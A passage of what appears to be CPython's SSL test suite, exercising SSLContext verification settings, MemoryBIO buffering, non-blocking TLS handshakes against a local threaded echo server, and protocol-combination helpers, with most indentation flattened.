ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
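    # The invariant being tested: check_hostname requires a verifying mode,
    # so assignment order matters.  A minimal sketch:
    #
    #     ctx.verify_mode = ssl.CERT_REQUIRED   # must happen first
    #     ctx.check_hostname = True             # OK now
    #     ctx.verify_mode = ssl.CERT_NONE       # ValueError while enabled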
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
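# Taken together, the MemoryBIO tests above pin down its contract: a FIFO
# byte buffer whose write() accepts any bytes-like object but not str, whose
# `pending` attribute tracks the unread byte count, and whose `eof` flag only
# becomes true after write_eof() *and* the buffer has been drained.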
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
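    # The loop above is the standard non-blocking handshake pattern: retry
    # do_handshake(), selecting for readability on SSLWantReadError and for
    # writability on SSLWantWriteError, until it returns without raising.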
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop.  Call func(*args); depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and
        # the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
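    # This is the canonical memory-BIO "pump": run one SSLObject operation,
    # flush whatever it placed in the outgoing BIO onto the wire, and on
    # WANT_READ feed wire bytes (or an EOF marker) into the incoming BIO
    # before retrying.  The same pump, minus the real socket, drives any
    # non-socket transport wrapped with ctx.wrap_bio().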
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
            def write(self, data):
                if self.sslconn:
                    return self.sslconn.write(data)
                else:
                    return self.sock.send(data)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
        class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
        def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
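    # The stats dict returned above is the contract between this helper and
    # the protocol tests: negotiated cipher, compression, peer certificate,
    # ALPN/NPN selections (client- and server-side), TLS version string, and
    # session-reuse information for a single echo round trip.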
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
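    # expect_success is effectively tri-state: False means the handshake
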